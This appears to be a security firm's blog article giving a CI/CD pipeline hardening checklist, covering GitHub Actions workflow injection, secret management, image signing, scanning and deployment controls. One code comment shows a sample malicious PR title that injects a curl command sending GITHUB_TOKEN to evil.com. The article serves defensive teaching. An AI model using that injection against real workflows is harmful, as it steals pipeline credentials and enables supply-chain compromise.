Your CI/CD pipeline is probably the most privileged system in your entire infrastructure. It has access to production credentials, deployment keys, cloud provider tokens, container registries, and the ability to push code directly to your customers. It runs with more access than any individual developer on your team. And in most organizations, it is one of the least secured components in the stack.
Attackers know this. The SolarWinds breach started with a compromised build pipeline. The Codecov incident exposed secrets from thousands of CI environments. The ua-parser-js and event-stream supply chain attacks weaponized the automated trust that pipelines place in upstream dependencies. These were not hypothetical scenarios or CTF challenges. They were production incidents that affected millions of users.
The problem is not that engineering teams are negligent. It is that CI/CD security falls into a gap between responsibilities. Developers own the pipeline configuration but think of it as a build tool, not a security boundary. Security teams audit the application code but rarely look at the .github/workflows/ directory or the Terraform modules that provision the pipeline infrastructure. The result is a high-value target that nobody is actively defending.
This article is the checklist we wish every engineering team had before their first production deployment. It covers the full attack surface of a modern CI/CD pipeline, from secret management to supply chain integrity, with specific, actionable guidance you can implement this week.
Why CI/CD pipelines are high-value targets
To understand why pipeline security matters, you need to think about what your CI/CD system actually has access to. In a typical setup, the pipeline can:
- Read and write to your source code repositories, including private repos containing proprietary business logic, internal tools, and infrastructure configuration
- Access production database credentials, API keys, encryption keys, and signing certificates needed for deployment
- Push container images to your registry and deploy them directly to production Kubernetes clusters or serverless platforms
- Modify cloud infrastructure through Terraform, CloudFormation, or Pulumi with IAM roles that often have far more permissions than necessary
- Access customer data indirectly through integration tests, database migrations, and seed scripts that run against production or production-adjacent environments
- Communicate with external services including package registries, notification systems, monitoring platforms, and third-party APIs
A compromised pipeline is not just a build system issue. It is a direct path to production, to customer data, and to every secret your application depends on. An attacker who gains control of your CI/CD pipeline effectively has the combined access of every service account, deployment key, and production credential that the pipeline uses.
The asymmetry is the problem. A developer laptop compromise gives an attacker access to whatever that developer can reach. A pipeline compromise gives the attacker access to everything the pipeline can reach, which in most organizations is everything in production. This is why pipeline security is not a "nice to have" - it is the single highest-leverage security investment most engineering teams can make.
Common CI/CD security failures
Before we get to the checklist, let us catalog the most common ways pipelines get compromised. These are not theoretical attacks. Every one of these patterns has been exploited in real-world incidents affecting real companies.
Secrets exposed in logs
- Build logs contain environment variables, command outputs, or debug information that includes credentials
- Secret masking is not enabled or does not cover all secret formats
- Error messages from failed API calls include authentication headers or tokens in plaintext
- Build artifacts or test reports are stored with embedded credentials
Overprivileged service accounts
- Pipeline service accounts have full admin access to cloud providers instead of scoped IAM roles
- A single set of credentials is shared across all pipeline stages (build, test, deploy to staging, deploy to production)
- Service accounts are never rotated and have no expiration policy
- The same token that runs unit tests can also push to production
Unsigned and unverified artifacts
- Container images are built and deployed without content trust or signature verification
- No chain of custody exists between what was built and what was deployed
- An attacker who compromises the artifact registry can replace a legitimate image with a malicious one
- Build provenance is not recorded, making incident response nearly impossible
Dependency confusion
- Internal package names are not reserved on public registries, allowing an attacker to publish a malicious package with the same name
- Package managers resolve public packages before private ones by default
- Lockfiles are not committed or are not enforced during CI builds
- No integrity checks (checksums, signatures) on downloaded dependencies
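For npm projects, the name-resolution half of the fix can be sketched in a project-level .npmrc. The scope and registry URL here are hypothetical placeholders for your organization's values:

```ini
; Route every @company-scoped package to the private registry so a
; same-named public package can never shadow it (registry URL is a placeholder)
@company:registry=https://npm.internal.example.com/
```

Combined with a committed lockfile, this removes the ambiguity that dependency confusion attacks rely on.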
If any of these sound familiar, you are not alone. In our experience conducting secure code reviews, at least three of these four patterns are present in the majority of CI/CD configurations we examine. The good news is that every one of them is fixable with the right configuration and practices.
GitHub Actions security
GitHub Actions is the most widely used CI/CD platform for modern software teams, and it has its own unique attack surface that deserves dedicated attention. The convenience features that make Actions easy to use are often the same features that create security vulnerabilities.
Workflow injection attacks
The most dangerous class of GitHub Actions vulnerabilities is workflow injection. This occurs when untrusted data from a pull request, issue, or comment is interpolated directly into a workflow using the ${{ }} expression syntax.
```yaml
# VULNERABLE: Attacker-controlled PR title is injected into a shell command
- name: Print PR title
  run: echo "PR: ${{ github.event.pull_request.title }}"

# An attacker can set their PR title to:
#   "; curl https://evil.com/steal?token=$GITHUB_TOKEN #
# which breaks out of the echo and exfiltrates the token
```
The fix is to never interpolate untrusted expressions directly into run: blocks. Instead, pass them through environment variables, which are not subject to shell injection:
```yaml
# SAFE: PR title is passed as an environment variable
- name: Print PR title
  run: echo "PR: $PR_TITLE"
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
```
This applies to any GitHub context value that can be influenced by an external contributor: github.event.pull_request.title, github.event.pull_request.body, github.event.issue.title, github.event.comment.body, github.head_ref, and branch names in general.
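The difference between the two patterns can be reproduced in a plain shell, outside of Actions entirely. In this self-contained sketch, the eval line stands in for what ${{ }} interpolation does to a run: block, and the title is a hypothetical attacker-chosen value:

```shell
# A hypothetical attacker-chosen PR title
TITLE='"; echo INJECTED #'

# UNSAFE: the title is spliced into the command text before the shell
# parses it, which is what ${{ ... }} interpolation does in a run: block
unsafe_out=$(eval "echo \"PR: $TITLE\"")

# SAFE: the title is passed as data in an environment variable; the shell
# expands it after parsing, so the payload is printed verbatim
safe_out=$(PR_TITLE="$TITLE" sh -c 'echo "PR: $PR_TITLE"')

echo "unsafe: $unsafe_out"
echo "safe: $safe_out"
```

In the unsafe case the output contains a second line, INJECTED, proving the attacker's command ran; in the safe case the full title is printed as inert text.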
GITHUB_TOKEN permissions
By default, the GITHUB_TOKEN in a workflow has broad read/write permissions across the repository. This is far more access than most workflows need. Restrict it at the workflow level:
```yaml
permissions:
  contents: read
  pull-requests: write
  # Only grant the specific permissions this workflow needs.
  # Never use permissions: write-all
```
You should also enable the organization-level setting that restricts the default GITHUB_TOKEN to read-only. This forces every workflow to explicitly declare the permissions it needs, following the principle of least privilege.
Third-party action risks
Every uses: directive in a GitHub Actions workflow is a trust decision. When you reference actions/checkout@v4, you are running code from a third-party repository inside your pipeline with full access to your repository secrets and GITHUB_TOKEN. Common mistakes include:
- Pinning to a mutable tag: `uses: some-action@v2` can be changed by the action maintainer at any time. An account compromise or malicious update can inject code into every pipeline that uses that action.
- Not pinning at all: `uses: some-action@main` runs whatever is currently on the main branch, including anything pushed in the last five minutes.
- Using unvetted actions: The GitHub Actions marketplace has no meaningful security review process. Anyone can publish an action, and many popular actions have had security vulnerabilities.
The mitigation is to pin every action to a specific commit SHA, not a tag or branch:
```yaml
# VULNERABLE: Mutable tag can be changed by the action maintainer
uses: actions/checkout@v4

# SAFE: Pinned to immutable commit SHA
uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
```
Tools like Dependabot and Renovate can automatically create pull requests to update these SHA pins when new versions are released, so you get both security and convenience.
Secret management in pipelines
Secrets are the crown jewels of your CI/CD pipeline, and they are frequently mismanaged. The goal is simple: secrets should be available to the pipeline stages that need them, invisible to everything else, and rotated frequently enough that a compromised secret has a limited blast radius.
What not to do
- Hardcode secrets in pipeline configuration files. This includes `.github/workflows/` YAML files, Jenkinsfiles, `.gitlab-ci.yml`, and any other pipeline definition committed to source control. These files are visible to anyone with repository access.
- Pass secrets as command-line arguments. Process arguments are visible to other users on most operating systems, and they appear in `/proc` on Linux. If your pipeline runs `deploy --api-key=sk-live-abc123`, that key may be visible in process listings.
- Store secrets in environment variables defined in the pipeline UI without masking. Many CI platforms do not mask secrets by default in build logs, and even those that do can be bypassed with creative output formatting.
- Use the same secret across all environments. Your staging API key should not be the same as your production API key. If staging is compromised, production should not be affected.
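The command-line argument problem is easy to demonstrate on Linux with standard tools. This sketch (the sk-live-FAKE123 value is obviously made up) starts a short-lived process both ways and inspects what /proc reveals:

```shell
KEY='sk-live-FAKE123' # fake credential for demonstration only

# BAD: the secret rides on the command line; /proc/<pid>/cmdline is
# world-readable, so any local user (or a careless log collector) sees it
sh -c 'sleep 1' deploy-sh --api-key="$KEY" &
pid=$!
leaked=$(tr '\0' ' ' < "/proc/$pid/cmdline")

# BETTER: the secret travels in the environment; /proc/<pid>/environ is
# readable only by the process owner, not by other users
API_KEY="$KEY" sh -c 'sleep 1' deploy-sh &
pid2=$!
clean=$(tr '\0' ' ' < "/proc/$pid2/cmdline")
wait

echo "argv version: $leaked"
echo "env version: $clean"
```

The first command line contains the key in full; the second does not.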
Vault integration
The gold standard for pipeline secret management is a dedicated secrets vault (HashiCorp Vault, AWS Secrets Manager, Google Secret Manager, or Azure Key Vault) with short-lived, dynamically generated credentials. Instead of storing a long-lived database password in your CI platform, the pipeline requests a temporary credential from the vault at the start of each run. That credential expires automatically, typically within minutes or hours.
This approach provides several advantages:
- No static credentials to steal. Even if an attacker exfiltrates the pipeline's credential, it expires before they can use it.
- Full audit trail. The vault logs every credential request, so you know exactly which pipeline run accessed which secrets.
- Centralized rotation. Rotating a secret in the vault immediately affects all pipelines that use it, without updating CI configuration.
- Scoped access. Each pipeline stage can be granted access to only the secrets it needs, enforced at the vault level.
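In GitHub Actions, this pattern might look like the following sketch using HashiCorp's official vault-action. The Vault URL, auth role, and secret path are all hypothetical, and in practice you would pin the action to a commit SHA as discussed earlier:

```yaml
- name: Fetch short-lived deploy credentials
  uses: hashicorp/vault-action@v3 # placeholder ref; pin to a commit SHA
  with:
    url: https://vault.internal.example.com # hypothetical Vault server
    method: jwt # authenticate with the workflow's OIDC identity token
    role: ci-deploy # hypothetical Vault role scoped to this pipeline
    secrets: |
      secret/data/ci/deploy api_key | DEPLOY_API_KEY
# DEPLOY_API_KEY is exported for later steps and expires with the Vault lease
```

Because authentication happens via the workflow's identity token, no long-lived Vault credential needs to be stored in the CI platform at all.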
Secret rotation
Every secret used by your pipeline should have a defined rotation schedule. For most credentials, 90 days is the maximum acceptable lifetime. For high-value secrets (production database credentials, signing keys, cloud provider root tokens), 30 days or less is appropriate. Ideally, secrets should be ephemeral: generated at the start of a pipeline run and destroyed at the end.
Automate rotation wherever possible. Manual rotation is a policy that will be ignored under deadline pressure. Automated rotation through your vault or cloud provider's native rotation features ensures it actually happens.
Container image security in build pipelines
If your pipeline builds and deploys container images, the image build process is a critical security boundary. A compromised or misconfigured image build can introduce vulnerabilities that bypass every other security control in your stack.
Base image selection and maintenance
- Use minimal base images. `alpine`, `distroless`, or `scratch` images have a fraction of the attack surface of full `ubuntu` or `debian` images. Fewer packages mean fewer CVEs to patch.
- Pin base image digests. Use `FROM node:20-alpine@sha256:abc123...` instead of `FROM node:20-alpine`. Tags are mutable. Digests are not.
- Rebuild images regularly. Even if your application code has not changed, base image updates may include critical security patches. Automate weekly or daily rebuilds.
- Do not run as root. Your Dockerfile should include a `USER` directive to run the application as a non-root user. This limits the impact of container escape vulnerabilities.
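Put together, those practices fit in a few Dockerfile lines. The digest below is a labeled placeholder, not a real image digest:

```dockerfile
# Placeholder digest - resolve the real one with: docker manifest inspect node:20-alpine
FROM node:20-alpine@sha256:<real-digest-here>
WORKDIR /app
COPY --chown=node:node . .
# The official node images ship a non-root "node" user; drop to it before start
USER node
CMD ["node", "server.js"]
```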
Image scanning in the pipeline
Integrate a container image scanner (Trivy, Grype, Snyk Container, or similar) into your pipeline that runs after the image build and before the image push. The scan should:
- Fail the build if critical or high-severity CVEs are detected in OS packages or application dependencies
- Detect hardcoded secrets, credentials, or private keys baked into the image layers
- Check for misconfigurations: running as root, unnecessary capabilities, exposed ports that should not be public
- Generate a report that is stored as a build artifact for audit purposes
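As a sketch of the fail-the-build step, here is what this might look like with Trivy's official GitHub Action. The image reference is hypothetical, and the action ref should be a pinned commit SHA in practice:

```yaml
- name: Scan image for vulnerabilities
  uses: aquasecurity/trivy-action@master # placeholder ref; pin to a commit SHA
  with:
    image-ref: registry.example.com/app:${{ github.sha }} # hypothetical image
    severity: CRITICAL,HIGH
    exit-code: '1' # any finding at these severities fails the job
    ignore-unfixed: true # optional: skip CVEs with no available patch yet
```

Placing this step between the build and the push ensures a vulnerable image never reaches the registry, let alone production.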
Image signing and verification
Use Cosign (from the Sigstore project) or Docker Content Trust to sign every image your pipeline produces. Then configure your deployment targets (Kubernetes admission controllers, ECS task definitions, etc.) to reject unsigned or incorrectly signed images. This creates a chain of trust: only images built by your pipeline can be deployed to your infrastructure.
```bash
# Sign the image after building
cosign sign --key cosign.key $IMAGE_REGISTRY/$IMAGE_NAME:$TAG

# Verify the signature before deploying
cosign verify --key cosign.pub $IMAGE_REGISTRY/$IMAGE_NAME:$TAG
```
SAST, DAST, and SCA integration points
A mature DevSecOps pipeline integrates multiple categories of security testing at the right points in the development lifecycle. The key is knowing what each tool type does and where it belongs.
| Tool Type | What It Tests | Where in the Pipeline | Limitations |
|---|---|---|---|
| SAST | Source code for known vulnerability patterns, insecure API usage, and taint flows | On every pull request, before merge. Block merge on critical findings. | High false positive rates. Cannot detect logic flaws, business logic bypasses, or authorization issues. |
| SCA | Dependencies for known CVEs, license violations, and end-of-life packages | On every pull request and on a scheduled nightly scan of the default branch. | Only finds known vulnerabilities with assigned CVEs. Zero-day and unreported vulnerabilities are invisible. |
| DAST | Running application for injection flaws, misconfigurations, and authentication issues from an external perspective | After deployment to a staging or QA environment. Run against a full application stack. | Slow. Cannot test all code paths. Requires a running application. Best used as a complement to SAST, not a replacement. |
| Secret Scanning | Code, configuration, and commit history for accidentally committed credentials | Pre-commit hook (developer machine) and post-commit CI check. Both. | Pattern-based detection. Custom or non-standard secret formats may be missed. Historical secrets in git history need separate tools. |
| IaC Scanning | Terraform, CloudFormation, Kubernetes manifests for misconfigurations | On every pull request that modifies infrastructure code. Block merge on high-severity findings. | Cannot detect runtime drift. Configuration may be correct in code but overridden manually in the cloud console. |
The critical mistake teams make is running all these tools but not acting on the results. A SAST scanner that produces 500 findings that nobody triages is worse than having no scanner at all, because it creates a false sense of security. Start with one tool per category, tune it to eliminate false positives, and enforce a policy that findings must be triaged within a defined SLA. As we covered in our secure code review guide, automated scanning is a complement to manual review, not a replacement for it.
Supply chain security
Your application is not just the code your team writes. It is your code plus every dependency, transitive dependency, build tool, base image, and third-party integration that your pipeline pulls in. Supply chain attacks target these trust relationships, and they are becoming more common every year.
Verifying dependencies
- Commit lockfiles and enforce them in CI. Your `package-lock.json`, `yarn.lock`, `Pipfile.lock`, `go.sum`, or `Cargo.lock` should be committed to the repository and enforced during CI builds with `npm ci` (not `npm install`), `pip install --require-hashes`, or the equivalent for your package manager. This ensures that the exact versions and checksums that a developer vetted locally are the same versions used in production.
- Verify package integrity. Modern package managers support integrity checking via checksums. Enable it. If someone tampers with a package on the registry, the checksum mismatch will fail your build instead of deploying the compromised version.
- Review dependency updates before merging. Automated dependency update PRs from Dependabot or Renovate should be reviewed, not auto-merged. Check the changelog, look at the diff, and verify the publisher has not changed unexpectedly.
- Reserve your internal package names on public registries. If your organization uses private packages named `@company/auth-utils`, register that name on npm (or your public registry) even if you never publish to it. This prevents dependency confusion attacks where an attacker publishes a public package with the same name as your private one.
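The integrity check in the second point can be sketched end to end with nothing but a shell and sha256sum (GNU coreutils assumed). The pinned hash plays the role of a lockfile's integrity field, and the append simulates registry-side tampering:

```shell
# "Download" a package and pin its hash, as a lockfile would
printf 'pretend package contents\n' > pkg.tgz
pinned=$(sha256sum pkg.tgz | cut -d' ' -f1)

# Simulate the registry copy being tampered with after the pin was taken
printf 'malicious payload\n' >> pkg.tgz

# A CI install step re-hashes the artifact before trusting it
actual=$(sha256sum pkg.tgz | cut -d' ' -f1)
if [ "$actual" = "$pinned" ]; then
  verdict="ok"
else
  verdict="tampered" # a real build would abort here instead of deploying
fi
echo "integrity check: $verdict"
rm -f pkg.tgz
```

This is exactly what `npm ci` and `pip install --require-hashes` do for every package, automatically.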
SBOM generation
A Software Bill of Materials (SBOM) is an inventory of every component in your application, including versions, licenses, and provenance information. Generate an SBOM as part of your pipeline and store it alongside every release artifact. When the next Log4Shell-scale vulnerability drops, you will be able to determine within minutes whether your application is affected, instead of scrambling to audit every service manually.
Tools like Syft, Trivy, and CycloneDX can generate SBOMs in standard formats (SPDX, CycloneDX) directly from your container images or application manifests. Store them in a registry alongside the artifact they describe, and integrate them with your vulnerability management platform for continuous monitoring. For more on managing your software supply chain risks, see our dedicated guide.
Infrastructure as Code scanning
If your pipeline deploys infrastructure changes through Terraform, CloudFormation, Pulumi, or Kubernetes manifests, those configuration files are part of your security surface. A misconfigured S3 bucket policy or an overprivileged IAM role defined in Terraform is just as dangerous as a SQL injection in your application code.
Common IaC misconfigurations
- Public S3 buckets or storage containers with ACLs that allow unauthenticated access to sensitive data
- Security groups or firewall rules that allow `0.0.0.0/0` ingress on management ports (SSH, RDP, database ports)
- IAM roles with wildcard permissions (`"Action": "*"`, `"Resource": "*"`) that violate least privilege
- Unencrypted storage for databases, EBS volumes, or message queues that should be encrypted at rest
- Missing logging and monitoring on critical resources (CloudTrail disabled, VPC flow logs missing, database audit logs turned off)
- Kubernetes manifests that run containers as root, mount the host filesystem, or disable security contexts
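The Kubernetes items in that list map directly onto a pod's securityContext. A minimal hardened sketch (the image reference is hypothetical):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: hardened-example
spec:
  containers:
    - name: app
      image: registry.example.com/app:1.2.3 # hypothetical image
      securityContext:
        runAsNonRoot: true # kubelet rejects the pod if the image runs as root
        allowPrivilegeEscalation: false # block setuid-style escalation
        readOnlyRootFilesystem: true
        capabilities:
          drop: ["ALL"] # start from zero Linux capabilities
```

IaC scanners flag manifests that omit these fields, which is far cheaper than discovering the gap at runtime.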
Integrating IaC scanning
Tools like Checkov, tfsec, KICS, and Bridgecrew scan your infrastructure code for these misconfigurations before they reach your cloud environment. Integrate them into your pipeline so that:
- Every pull request that modifies `*.tf`, `*.yaml` (Kubernetes/CloudFormation), or other IaC files triggers a scan
- High and critical severity findings block the merge
- Medium and low findings are tracked as technical debt with a defined remediation timeline
- Custom policies enforce your organization-specific requirements (e.g., "all resources must have cost allocation tags" or "all databases must use customer-managed encryption keys")
The shift-left principle applies here just as it does to application security. Catching a misconfigured security group in a pull request is orders of magnitude cheaper than discovering it after an attacker has already used it to access your database.
Branch protection and code review enforcement
Your pipeline is only as secure as the process that governs what code enters it. Without proper branch protection, a single compromised developer account can push malicious code directly to the main branch and trigger a production deployment with no review.
Minimum branch protection rules
- Require pull requests for all changes to the default branch. No direct pushes, no exceptions. This applies to repository administrators as well.
- Require at least one approval from a code owner. Use CODEOWNERS files to ensure that changes to sensitive files (pipeline configuration, IaC, authentication code, deployment scripts) require approval from the appropriate team.
- Require status checks to pass. All CI checks (tests, SAST, SCA, linting) must pass before a pull request can be merged. Do not allow bypassing failed checks.
- Require signed commits. GPG or SSH commit signing verifies that commits were actually created by the developer who claims to have created them. This prevents an attacker from pushing commits impersonating a trusted developer.
- Dismiss stale approvals. If a pull request is approved and then additional commits are pushed, the approval should be dismissed and a new review required. This prevents an attacker from getting a benign PR approved and then pushing malicious code before merge.
- Restrict force pushes and branch deletion. Force pushes can rewrite history to hide malicious commits. Branch deletion can disrupt auditing. Both should be restricted to a small number of administrators.
Pipeline configuration is code. Your .github/workflows/, Jenkinsfile, .gitlab-ci.yml, and Dockerfile should be subject to the same review requirements as your application code. A change to the deployment pipeline is at least as impactful as a change to any application endpoint. Require code owner approval for all pipeline configuration changes.
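A CODEOWNERS file expressing that policy might look like this sketch (the team names are hypothetical):

```
# The last matching pattern wins, so the general fallback goes first
* @company/engineering

# Sensitive paths require approval from the named teams
/.github/workflows/ @company/security-team
/terraform/ @company/platform-team
Dockerfile @company/platform-team
```

With "Require review from Code Owners" enabled in branch protection, no pipeline change can merge without the designated team signing off.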
Deployment security
The final stage of the pipeline - getting code from a build artifact to a production environment - is where many security controls are either enforced or bypassed. A secure deployment process ensures that only tested, reviewed, and authorized changes reach production.
Immutable artifacts
Once an artifact (container image, compiled binary, bundled application) passes your CI checks, it should be stored in an immutable artifact registry and deployed without modification. The exact artifact that was tested is the exact artifact that gets deployed. No rebuilding, no recompiling, no "quick patches" applied between staging and production.
This principle eliminates an entire class of attacks where the build output is modified between the test phase and the deployment phase. Tag your artifacts with the git commit SHA they were built from, sign them, and verify the signature at deployment time.
Approval gates
Production deployments should require explicit approval from authorized team members. This is not about slowing down deployments. It is about ensuring that a compromised CI system or a rogue automation cannot push code to production without a human in the loop. Modern CI/CD platforms support environment-level approvals:
- GitHub Actions: Use environment protection rules that require reviewer approval before a deployment job targeting the `production` environment can execute
- GitLab CI: Use `when: manual` for production deployment stages with protected environments
- CircleCI: Use approval jobs in workflows to gate production deployments
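For GitLab, the manual gate looks like this sketch (the deploy script path is hypothetical); combined with a protected environment, only authorized users can trigger the job:

```yaml
deploy_production:
  stage: deploy
  script:
    - ./scripts/deploy.sh production # hypothetical deploy script
  when: manual # requires a human to trigger the job
  environment:
    name: production # protect this environment to restrict who may deploy
```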
The approval should include a review of what is actually being deployed: the commit range, the changelog, the test results, and the security scan outputs. An approval gate that rubber-stamps every deployment provides no value.
Rollback capability
Secure deployments include the ability to quickly roll back to a known-good state. If a deployment introduces a security vulnerability (or if a compromised artifact makes it past your controls), the time to detect and revert is the primary factor in limiting blast radius. Ensure your deployment process supports:
- One-command rollback to any previous artifact version
- Canary deployments that expose new versions to a small percentage of traffic before full rollout
- Automated rollback triggers based on error rates, latency thresholds, or security signals
- An immutable audit log of every deployment, including who approved it, what was deployed, and when
Monitoring and alerting for pipeline anomalies
Prevention is essential, but detection is the safety net. Even with every control in this checklist implemented, you need visibility into anomalous pipeline behavior that could indicate a compromise in progress.
What to monitor
- Pipeline configuration changes: Any modification to workflow files, pipeline scripts, or deployment configuration should trigger an alert to the security team. These changes should be rare and reviewed carefully.
- Unusual build patterns: Builds triggered outside normal hours, by accounts that do not normally commit, or targeting branches that are not part of normal development workflows.
- Secret access patterns: If your vault integration logs access, monitor for secrets being accessed by pipeline runs that should not need them, or secrets being accessed more frequently than expected.
- Network egress from build environments: CI runners should have restricted network access. Outbound connections to unexpected destinations (especially data exfiltration to external servers) should trigger alerts.
- Failed security checks that are overridden: Track when developers or administrators bypass failed security gates. One or two overrides for known false positives is normal. A pattern of overrides may indicate someone is trying to push vulnerable code through the pipeline.
- New or modified third-party actions/integrations: When a workflow starts using a new GitHub Action or the SHA pin of an existing action changes, that should be flagged for review.
Centralized pipeline logging
Send all pipeline logs to a centralized, append-only logging system that is separate from the pipeline itself. If an attacker compromises your CI system, they should not be able to delete or modify the logs that would reveal the compromise. Use a SIEM or log aggregation platform (Datadog, Splunk, Elastic, or even a dedicated S3 bucket with object lock) to store and analyze pipeline audit data.
The DevSecOps maturity roadmap
Implementing everything in this article at once is not realistic for most teams. Security is a journey, not a destination. Here is a practical maturity roadmap that prioritizes the highest-impact controls first and builds toward a comprehensive DevSecOps practice over time.
1. Foundation (Weeks 1-2)
Enable branch protection rules on your default branch. Require pull requests, at least one review, and passing status checks. Move all secrets from pipeline configuration files to your CI platform's secret storage. Enable secret masking in build logs. Pin third-party actions to commit SHAs.
2. Automated Scanning (Weeks 3-4)
Add SCA scanning (Dependabot, Snyk, or Renovate) to flag known vulnerabilities in dependencies. Add a secret scanner (GitLeaks, TruffleHog) as a pre-commit hook and CI check. Commit and enforce lockfiles. Configure your package manager to use --frozen-lockfile or npm ci in CI.
3. Pipeline Hardening (Month 2)
Restrict GITHUB_TOKEN permissions to the minimum required per workflow. Implement least-privilege service accounts with separate credentials per environment. Add container image scanning if you deploy containers. Set up IaC scanning for infrastructure code. Require signed commits from all contributors.
4. Advanced Controls (Month 3)
Integrate a secrets vault for dynamic, short-lived credentials. Implement image signing and verification with Cosign. Add SAST scanning to pull request checks. Set up deployment approval gates for production environments. Generate and store SBOMs with every release.
5. Continuous Improvement (Ongoing)
Add DAST scanning against staging environments. Implement canary deployments with automated rollback. Set up centralized pipeline logging and anomaly detection. Conduct regular pipeline security audits. Establish a secret rotation schedule and automate it. Run tabletop exercises simulating pipeline compromise scenarios.
Each stage builds on the previous one. Do not skip ahead to image signing before you have branch protection and secret management in place. The foundations matter more than the advanced controls, because they address the most common and most easily exploited attack vectors.
Putting it into practice
CI/CD pipeline security is not a separate discipline from application security. It is the foundation that everything else builds on. The most thoroughly reviewed application code in the world is meaningless if an attacker can modify it during the build process, inject malicious dependencies, steal deployment credentials, or push a compromised artifact directly to production.
Start with the foundation: branch protection, secret management, and dependency integrity. Then layer on automated scanning, image security, and deployment controls. Finally, add monitoring and detection to catch what prevention misses. The roadmap above gives you a realistic timeline, but the most important step is the first one.
If you are not sure where your pipeline stands, a security code review that includes pipeline configuration analysis will identify the gaps and give you a prioritized remediation plan. The vulnerabilities in your CI/CD system are not hypothetical risks. They are the attack vectors that sophisticated adversaries are actively exploiting, and the window between "we should fix that" and "we just got breached" is shorter than most teams realize.
Need help securing your pipeline and codebase?
Our security engineers review your CI/CD configuration, pipeline code, and deployment architecture alongside your application source code. We identify the vulnerabilities that automated tools miss and deliver a prioritized remediation plan your team can act on immediately.